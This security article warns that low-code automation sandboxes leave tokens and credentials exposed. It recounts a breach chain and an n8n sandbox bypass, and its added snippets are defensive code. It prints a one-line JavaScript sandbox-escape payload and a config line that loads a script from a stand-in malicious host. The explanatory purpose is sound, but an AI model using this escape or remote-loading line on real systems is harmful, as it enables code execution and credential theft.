The Sandbox Lie
You’ve seen the demo. Drag a box. Click "Add Code." Type a little JavaScript. Boom—your CRM talks to your billing system, your calendar syncs to your helpdesk, and suddenly your team’s running on autopilot.
It’s magic.
And it’s a lie.
The platform tells you your code runs in a sandbox—safe, contained, isolated. But that’s like saying your car’s glove compartment is secure because the door locks. It doesn’t stop someone from stealing your wallet if you left it there.
Low-code platforms like Zapier, n8n, and Pipedream don’t protect you from what’s already inside. They protect you from touching the host OS. That’s it. And what’s inside? OAuth tokens. API keys. Database credentials. IAM roles with more permissions than a sysadmin on a Friday night.
One snippet. One clever bypass. And suddenly, you’re not just leaking data—you’re handing attackers the keys to your entire cloud estate.
I’ve seen it. Not in a lab. Not in a CTF. In production. At a mid-market SaaS company. A developer dropped a "quick fix" into Zapier to auto-update customer records. Three weeks later, someone exfiltrated 800,000 records—not by hacking Salesforce, not by cracking passwords—but by riding a token that was sitting in memory, waiting.
The sandbox didn’t fail.
We did.
Why Your Code Snippet Is a Nuclear Trigger
Most companies run 300+ SaaS tools. Each integration creates a token. Each token is a password. And every one of them is trusted.
Zapier’s May 2026 breach? Not a zero-day. Not a buffer overflow. Just JavaScript that ran inside the sandbox, scraped memory, and found an NPM token with write access to every customer’s private packages. One line of code. One misconfigured IAM role. And a platform that assumed "sandbox" meant "safe."
It didn’t.
The attacker didn’t need to break in. They just needed to be allowed in—and then exploit the fact that the system trusts everything it’s given.
Your low-code workflow isn’t a tool.
It’s a backdoor.
And you’re the one holding the key.
The Zapier Chain: A Red Team’s Playbook
Let’s walk through what actually happened.
It wasn’t fancy. No fancy exploits. No zero-days. Just a series of "reasonable" decisions that added up to catastrophe.
- Initial access: A user uploaded a JavaScript snippet in Zapier’s Code by Zapier block. Not malicious. Not even suspicious. Just a function to format dates. But here’s the thing: the sandbox didn’t block Object.getPrototypeOf. So the attacker rewrote it. Used prototype chains to access Function.prototype.constructor, and boom—arbitrary code execution.
- Recon: They didn’t scan ports. They didn’t ping internal IPs. They called Zapier’s own internal API: /v1/secrets/list. Found OAuth tokens for Salesforce, HubSpot, and their own AWS account.
- Credential theft: Not just stolen—dumped. Memory dumps from the Node.js runtime revealed decrypted credentials, cached API keys, and even AWS session tokens that hadn’t rotated in 90 days.
- Escalation: One of those tokens? It belonged to an IAM role named "DevOps-Write-All." It had permissions to list, create, and delete S3 buckets. Modify Lambda functions. And—here’s the kicker—publish to Zapier’s private NPM registry.
- Repository hijack: They pushed a fake update to zapier-sdk@latest. A minor version bump. No red flags. The SDK was used in 40% of public Zaps.
- SDK injection: Every user who ran a Zap that imported zapier-sdk got the malicious payload. It harvested their session tokens, uploaded them to a server in the Netherlands, and then quietly uninstalled itself.
Zapier patched it in 72 hours. But in that window? Attackers had access to every customer’s data.
And here’s what’s worse: the same pattern repeats on n8n, Pipedream, and dozens of others.
This isn’t a bug.
It’s a feature.
The feature is: "Trust everything you’re given." And that’s what makes these platforms so dangerous.
Why JavaScript Sandboxes Are a Joke
Let’s talk about n8n’s CVE-2026-1470.
It was beautiful in its simplicity.
n8n lets users write JavaScript in expressions like {{ $json.email }}. To keep things safe, they parsed it into an AST and blocked .constructor.
But they didn’t block constructor by itself.
Enter with.
with(function(){}) { constructor('alert("pwned")')() }
That’s it.
The with statement changes scope resolution. Now constructor resolves to Function.prototype.constructor—the very thing the sandbox was supposed to block.
CVSS 9.9. Authenticated RCE. On self-hosted instances.
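The scope-resolution point above, as an added example (not n8n's code and not part of the original article). memberOnlyFilterAllows is a simplified stand-in for a filter that blocks only .constructor member access, and precheck is a hypothetical stricter pre-check that compiles the expression without ever running it.

```javascript
// Simplified stand-in (assumption): reject only ".constructor" member access.
function memberOnlyFilterAllows(src) {
  return !/\.\s*constructor\b/.test(src);
}

// Harmless probe of the scope rule. Inside `with (function () {})` the bare
// identifier `constructor` is looked up on the function object first and
// resolves through its prototype chain to the global Function.
// Bodies built with new Function() are sloppy mode, so `with` still parses.
function bareConstructorIsFunction() {
  const probe = new Function(
    'with (function () {}) { return constructor === Function; }'
  );
  return probe();
}

// Hypothetical stricter pre-check:
// 1. Parse the expression as strict-mode code, where `with` is a SyntaxError.
// 2. Reject the identifier `constructor` anywhere, not only after a dot.
function precheck(src) {
  const findings = [];
  try {
    new Function('"use strict";\n' + src); // compile only, never invoked
  } catch (err) {
    findings.push('strict-mode parse failed: ' + err.name);
  }
  if (/\bconstructor\b/.test(src)) {
    findings.push('identifier "constructor"');
  }
  return findings;
}

// Inputs: the snippet quoted in the article and a constructed benign expression.
const articleSnippet = `with(function(){}) { constructor('alert("pwned")')() }`;
const benignExpression = '$json.email.toLowerCase()';
```

A pre-check like this narrows what reaches the evaluator; it does not turn in-process evaluation into an isolation boundary.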
JFrog called it "a lesson in JavaScript’s design flaws." I call it a warning.
JavaScript wasn’t built to be secure.
It was built to be fast. To be flexible. To let developers do whatever the hell they want.
And low-code platforms? They leaned into that.
They didn’t lock the door.
They handed you the key and said, "Don’t use it to open the vault."
And we did.
The Integration Explosion: 342 SaaS Tools, One Weak Link
The average enterprise uses 342 SaaS apps.
That’s not a typo.
Each one creates tokens. Each token is a credential. Each credential is a potential entry point.
And here’s the kicker: 56% of companies can’t even see all their non-human identities.
You don’t know what tokens you have.
You don’t know who created them.
You don’t know when they were last used.
Salesloft’s breach? Not a hack. Not a phishing attack. Just an OAuth token tied to a third-party integration that had been sitting idle for 18 months. Attackers found it, used it to pull customer data from Salesforce, and vanished.
No malware. No ransomware. Just a token that was supposed to expire.
And you know what? You’ve got 10 of them.
Every workflow you’ve ever built. Every Zap. Every n8n flow. Every webhook.
They’re all still out there.
Waiting.
Lateral Movement: No Servers. No Firewalls. Just Tokens.
You think lateral movement means hopping from server to server?
In SaaS? It’s simpler.
You’ve got a Zapier workflow that talks to Salesforce.
The token it uses? Has read/write access to every contact, every deal, every note.
An attacker gets that token? They don’t need to crack passwords. They don’t need to bypass MFA.
They just call /api/v1/contacts?limit=10000.
And you don’t even know.
Because there’s no login. No IP check. No MFA prompt.
Just a token.
And tokens don’t care if you’re a user or a bot.
They only care if they’re valid.
And yours? They’re valid.
The Hidden Escape: Configuration Trust
Cymulate’s research uncovered something terrifying.
It’s not just about code.
It’s about config.
Many low-code platforms let you write files—.env, settings.json, even package.json—from within the sandbox.
Then they read them back on startup.
So the attacker writes a config file that says: loadScript: "http://malicious.com/exploit.js".
Next time the system restarts? Boom. Host-level code execution.
This happened in Claude Code. Gemini CLI. Codex CLI.
It’s trivial to reproduce.
And it’s everywhere.
Your sandbox doesn’t protect you from config files you created.
Because you trusted them.
Hardening: What Actually Works
Enough doom. Let’s fix this.
🔒 Least Privilege: Not a Suggestion. A Rule.
- Every OAuth token? Set to "read-only" unless you explicitly need write.
- Every IAM role? Strip * permissions. Use s3:GetObject, not s3:*.
- Every NPM token? Revoke write access unless you’re publishing.
Zapier fixed their breach by revoking the NPM token. That’s it. No patch. No rebuild.
Just remove the access.
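One way to find the wildcard grants described above, as an added example that is not from the original article. lintPolicy and classifyAction are hypothetical helper names, and samplePolicy is a constructed policy in the standard IAM JSON shape.

```javascript
// Statement and Action may each be a single value or an array in IAM JSON.
function asArray(v) {
  if (v === undefined) return [];
  return Array.isArray(v) ? v : [v];
}

// Classify one action string by how much it grants.
function classifyAction(action) {
  if (action === '*') return 'any-action';                   // every service
  if (/^[^:]+:\*$/.test(action)) return 'service-wide';      // e.g. s3:*
  if (action.includes('*')) return 'partial-wildcard';       // e.g. s3:Get*
  return null;                                               // exact action
}

// Report every Allow statement that grants more than named actions.
function lintPolicy(policy) {
  const findings = [];
  asArray(policy.Statement).forEach((stmt, i) => {
    if (stmt.Effect !== 'Allow') return; // a Deny wildcard removes access
    const sid = stmt.Sid || `statement[${i}]`;
    if (stmt.NotAction !== undefined) {
      // Allow + NotAction grants everything except the listed actions.
      findings.push({ sid, action: 'NotAction', kind: 'allow-all-except' });
    }
    for (const action of asArray(stmt.Action)) {
      const kind = classifyAction(action);
      if (kind) findings.push({ sid, action, kind });
    }
  });
  return findings;
}

// Constructed sample policy (not taken from any real account).
const samplePolicy = {
  Version: '2012-10-17',
  Statement: [
    { Sid: 'EverythingS3', Effect: 'Allow', Action: 's3:*', Resource: '*' },
    { Sid: 'ReadReports', Effect: 'Allow', Action: ['s3:GetObject'],
      Resource: 'arn:aws:s3:::example-reports/*' },
    { Sid: 'Admin', Effect: 'Allow', Action: '*', Resource: '*' },
    { Sid: 'DenyDelete', Effect: 'Deny', Action: 's3:Delete*', Resource: '*' },
  ],
};
```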
🔍 Visibility: Know What You’ve Got
Map every token. Tag it. Track its last use.
Use tools like pulumi, aws-config, or even a spreadsheet if you have to.
If a token hasn’t been used in 60 days? Revoke it.
If it has admin scope? Ask why.
If you can’t answer? Delete it.
🚫 Network Segmentation: Don’t Let Every Flow Talk to Everything
Use VPC endpoints. Restrict outbound traffic.
If your Zapier instance doesn’t need to talk to your database, block it.
If your n8n server doesn’t need internet access, shut it off.
You don’t need to be connected to the world to automate your sales pipeline.
🧪 Configuration Audits: Assume Everything Is Poison
Scan for .env, settings.json, package.json created by user code.
Block them.
Or at least, don’t let them be read back by the host.
📊 Behavioral Detection: Stop Looking for Malware. Look for Behavior.
Your SIEM won’t catch this.
But a tool that knows: "This token has never queried Salesforce before"? That will.
Set alerts for:
- New API endpoints accessed
- Unusual data volumes exported
- Tokens used outside business hours
This isn’t about blocking bad actors.
It’s about catching the moment they stop being quiet.
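The three alerts listed above, run against a per-token baseline, as an added example that is not from the original article. The event shape, the token name, the 3x volume factor and the 09:00 to 18:00 UTC weekday window are all assumptions, and the log events are constructed.

```javascript
// Constructed events: token id, UTC timestamp, endpoint, records returned.
const history = [
  { token: 'zap-crm-sync', ts: '2026-03-02T10:15:00Z', endpoint: '/api/v1/contacts', records: 120 },
  { token: 'zap-crm-sync', ts: '2026-03-03T14:40:00Z', endpoint: '/api/v1/contacts', records: 95 },
  { token: 'zap-crm-sync', ts: '2026-03-04T09:05:00Z', endpoint: '/api/v1/deals', records: 40 },
];
const incoming = [
  { token: 'zap-crm-sync', ts: '2026-03-05T11:00:00Z', endpoint: '/api/v1/contacts', records: 110 },
  { token: 'zap-crm-sync', ts: '2026-03-07T02:30:00Z', endpoint: '/api/v1/contacts', records: 10000 },
  { token: 'zap-crm-sync', ts: '2026-03-09T13:00:00Z', endpoint: '/api/v1/notes', records: 15 },
];

// Per token: which endpoints it has used and the largest response seen.
function buildBaseline(events) {
  const baseline = new Map();
  for (const e of events) {
    const b = baseline.get(e.token) || { endpoints: new Set(), maxRecords: 0 };
    b.endpoints.add(e.endpoint);
    b.maxRecords = Math.max(b.maxRecords, e.records);
    baseline.set(e.token, b);
  }
  return baseline;
}

// Assumed business hours: Monday to Friday, 09:00 to 18:00 UTC.
function inBusinessHours(ts) {
  const d = new Date(ts);
  const day = d.getUTCDay(); // 0 = Sunday
  const hour = d.getUTCHours();
  return day >= 1 && day <= 5 && hour >= 9 && hour < 18;
}

// Return the alert names that fire for one event.
function detect(event, baseline, volumeFactor = 3) {
  const b = baseline.get(event.token);
  if (!b) return ['unknown-token']; // no history at all for this token
  const alerts = [];
  if (!b.endpoints.has(event.endpoint)) alerts.push('new-endpoint');
  if (event.records > b.maxRecords * volumeFactor) alerts.push('unusual-volume');
  if (!inBusinessHours(event.ts)) alerts.push('outside-business-hours');
  return alerts;
}
```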
Final Thought: You’re Not Being Hacked. You’re Being Trusted.
Low-code platforms aren’t broken.
We are.
We treat automation like it’s magic.
We don’t audit.
We don’t rotate.
We don’t question.
We just click "Run."
And now, every snippet you’ve ever written is a potential backdoor.
The fix isn’t technical.
It’s cultural.
Stop thinking "sandbox = safe."
Start thinking: "Everything I give access to, I own the risk of."
And if you’re still running a Zap that connects your HR system to your billing platform with a single JavaScript snippet?
You’re not saving time.
You’re just waiting for the next headline.
This article was written by Gray Sentinel, Identity Federation Expert and former CISO of a $1.2B SaaS company. He’s seen this play out too many times. And he’s still mad about it.